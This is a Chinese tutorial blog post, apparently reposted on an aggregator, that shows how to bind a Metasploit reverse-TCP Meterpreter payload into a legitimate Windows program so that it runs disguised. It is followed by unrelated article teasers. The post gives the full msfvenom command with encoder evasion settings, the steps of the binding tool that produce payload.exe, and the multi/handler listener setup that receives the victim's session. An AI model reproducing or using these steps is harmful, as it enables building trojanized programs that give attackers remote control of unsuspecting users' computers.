kali-捆绑应用程序

news2024/12/23 0:02:15

文章目录

  • 一、安装开发环境
  • 二、开始捆绑
  • 三、开始监听

操作环境

kali

windows

一、安装开发环境

┌──(kali㉿kali)-[~]
└─$ sudo -i
[sudo] kali 的密码:
                     
┌──(root㉿kali)-[~]
└─# whoami            
root

┌──(root㉿kali)-[~]
└─# apt update                                                  
                                                                             
┌──(root㉿kali)-[~]
└─# apt -y install golang

使用 msfvenom 生成 msf 程序

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp  LHOST=192.168.64.129 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 11 -f exe -o msf.exe

参数说明:

-a 指定架构如 x86 x64。 x86 代表 32 位, x64 代表 64 位

–platform 指定平台,这里选择 windows,通过 --l platforms 可以查看所有支持的平台

-p 设置载荷,我们使用 windows/meterpreter/reverse_tcp,可以通过-l payloads 查看所有载荷

LHOST 目标主机执行程序后连接我们 Kali 的地址

LPORT 目标主机执行程序后连接我们 Kali 的端口

-b 去掉坏字符,坏字符会影响 payload 正常执行。

-e 指定编码器,x86/shikata_ga_nai 是 msf 自带的编码器,可以通过 -l encoders 查看所有编码器

-i 指定 payload 有效载荷编码迭代次数。

-f 指定生成格式,可以是 raw,exe,elf,jar,c 语言的,python 的,java 的……,用 -l formats 查看所有支持的格式

-o 指定文件名称和导出位置

准备完成以下材料

┌──(root㉿kali)-[~]
└─# ls
1.ico superdic-cr.exe binding  msf.exe

二、开始捆绑

#增加执行权限
┌──(root㉿kali)-[~]
└─# chmod +x binding
#注:第一个参数    msf.exe 为生成程序,第二个参数   superdic-cr.exe 为我们要捆绑的应用,第 三个参数    1.ico 是 ico 图标。
┌──(root㉿kali)-[~]
└─# ./binding msf.exe superdic-cr.exe 1.ico

┌──(root㉿kali)-[/home/kali]
└─# cd output       

┌──(root㉿kali)-[/home/kali/output]
└─# ls
payload.exe
#下载生成文件到本地
┌──(root㉿kali)-[/home/kali/output]
└─# sz output/payload.exe

三、开始监听

┌──(root㉿kali)-[/home/kali/output]
└─# msfdb run
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.64.129
msf6 exploit(multi/handler) > set lport 4444 
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.64.129:4444 

windows运行payload.exe,出现了之前捆绑的文件

在这里插入图片描述

另一个文件

!在这里插入图片描述

回到Kali,监听到了用户机

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1322064.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

(七)STM32 NVIC 中断、优先级管理及 AFIO 时钟的开启

目录 1. 中断相关知识简介 1.1 什么是中断 1.2 什么是内中断、外中断 1.3 什么是可屏蔽中断、不可屏蔽中断 2. CM3 内核中断介绍 2.1 F103系统异常清单 2.2 F103 外部中断清单 3. NVIC 简介 3.1 NVIC 寄存器简介 3.2 NVIC 相关寄存器的介绍 4. 中断优先级 4.1 优先…

uni-app 用于开发H5项目展示饼图,使用ucharts 饼图示例

先下载ucharts H5示例源码: uCharts: 高性能跨平台图表库,支持H5、APP、小程序(微信小程序、支付宝小程序、钉钉小程序、百度小程序、头条小程序、QQ小程序、快手小程序、360小程序)、Vue、Taro等更多支持canvas的框架平台&#…

洛谷 P8794 [蓝桥杯 2022 国 A] 环境治理

文章目录 [蓝桥杯 2022 国 A] 环境治理题目链接题目描述输入格式输出格式样例 #1样例输入 #1样例输出 #1 提示 思路解析CODE给点思考 [蓝桥杯 2022 国 A] 环境治理 题目链接 https://www.luogu.com.cn/problem/P8794 题目描述 LQ 国拥有 n n n 个城市,从 0 0 …

【无标题】CTF之SQLMAP

拿这一题来说 抓个包 复制报文 启动我们的sqlmap kali里边 sqlmap -r 文件路径 --dump --dbs 数据库 --tables 表

【老牌期刊】IF:6+,2天预审,3-5个月录用!

期刊简介 1区计算机智能类SCI 【期刊概况】IF:6.0-7.0,JCR1区,中科院2区; 【终审周期】走期刊部系统,3个月左右录用; 【检索情况】SCI检索; 【WOS收录年份】2018年; 【自引率】…

远程桌面连接软件除了Todesk还能用什么?

自从昨天Todesk开始报错,开始寻找好用的远程桌面连接软件,目前尝试了解到的免费的有RayLink和Teamviewer: TeamViewer:就个人来讲,感觉用户体验不是很友好 : 有什么好用的免费的远程桌面连接软件&#xff0…

html中RGB和RGBA颜色表示法

文章目录 RGB什么是RGBRGB颜色模式的取值范围RGB常用颜色对照表 RGBA什么是RGBARGBA颜色模式的取值范围 总结 RGB 什么是RGB RGB是一种颜色空间,其中R代表红色(Red)、G代表绿色(Green)、B代表蓝色(Blue&a…

外汇天眼:芝加哥商品交易所(CME)对鹰七公司规定进行罚款

国际衍生品市场CME集团发布了一则关于Eagle Seven LLC的纪律行动通知。根据一项和解提议,其中Eagle Seven LLC既未承认也未否认任何违规规定或事实陈述,纽约商业交易所(NYMEX)业务行为委员会的一个小组认定,在2022年2月…

非专业的建模人员如何给模型设置材质纹理贴图?

在线工具推荐: 3D数字孪生场景编辑器 - GLTF/GLB材质纹理编辑器 - 3D模型在线转换 - Three.js AI自动纹理开发包 - YOLO 虚幻合成数据生成器 - 三维模型预览图生成器 - 3D模型语义搜索引擎 1、材质和纹理的区别于关联 材质(Material)是…

【HarmonyOS开发】ArkTs实现侧栏联动

侧栏联动功能模块: 1、切换左侧导航,右侧滚动到对应的内容。 2、滚动右侧的内容,左侧会切换对应的导航。 1、涉及知识点 List(列表组件)、ListItemGroup(列表item分组) 2、效果预览 3…

AI数字人短视频矩阵怎么做?

AI数字人是什么:你可以通过我们的系统克隆出多个AI形象,每个数字人都有独特的个性和风格。无论是批量制作短视频,还是直播7*24小时都可以。数字人就是用AI技术根据你的真人形象克隆出一个数字人,跟真人的相似度可以达到100&#x…

【FAQ】运动健康服务云侧数据常见问题及解答

目录 Q1:v2接口相比于v1接口传参及返回的数据格式有变化吗?是否可以直接将v1接口改成v2接口? Q2:如何获取采集健康数据的穿戴设备信息? Q3:如何处理非华为手机产生的步数调用采样明细接口查询不到数据&a…

STM32-I2C通讯-AHT20温湿度检测

非常感谢,提供的视频学习 https://www.bilibili.com/video/BV1QN411D7ak/?spm_id_from333.788&vd_source8ca4826038edd44bb618801808a5e076 该文章注意:串口显示中文会乱码,必须选用支持ASCII的串口助手,才能正常显示中文。…

软考真的只准计算机专业报考吗?其实你也可以!

因为软考的全称为计算机技术与软件专业技术资格(水平)考试,很多人误以为软考只允许计算机专业的人报考,实际上并非如此~ 首先,让我们一起来看一下软考的报考条件 软考报考条件 软考的报考条件相对宽松,有…

自动化测试知识总结(含资料)

一、自动化测试 自动化测试的定义:使用一种自动化测试工具来验证各种软件测试的需求,它包括测试活动的管理与实施、测试脚本的开发与执行。 自动化测试只是测试工作的一部分,是对手工测试的一种补充; 自动化测试绝不能代替手工测试;多数情况…

【Mybatis】日常知识点随笔(持续更新)

目录 【K】Mybatis使用Select注解书写简单sql 【K】MySQL 数据类型与 Java 类型的对应关系 【K】Mybatis相同代码复用 1. 定义公共 SQL 片段 2. 引用公共 SQL 片段 3. 使用参数 4. 复用和组合 5. 注意事项 【K】mysql如何实现插入一条数据后立刻获取该数据自增长id进行…

软件测试面试:测试基础题

软件测试的流程是什么?(测试流程) (1)需求调查:全面了解系统概况、应用领域、软件开发周期、软件开发环境、开发组织、时间安排、功能需求、性能需求、质量需求及测试要求等。根据系统概况进行项目所需的人…

flowable-startEvent[开始事件]相关配置[表单、执行监听器]

flowable各个事件、网关、任务的使用详解 既然网上没有合适的教程,那就力求达到先会用,再理解。 当然各个事件有一些功能是重复的,比如事件和任务都有执行监听器,这个等说到任务的时候就会提一下,然后带过。 今天只看“…

FFmpeg 简单文档

一、播放器框架 常用音视频术语 容器/文件(Conainer/File):即特定格式的多媒体文件,比如mp4、flv、mkv等。媒体流(Stream):表示时间轴上的一段连续数据,如一段声音数据、…

MySQL调优参考文档-MSB

1.操作与落地 1.1.数据库基础知识 1.1.1.范式化设计 1.1.1.1.什么是范式 范式来自英文Normal Form,简称NF。 实际上你可以把它粗略地理解为 一张数据表的表结构所符合的某种设计标准的级别 。就像家里装修买建材,最环保的是E0级,其次是E…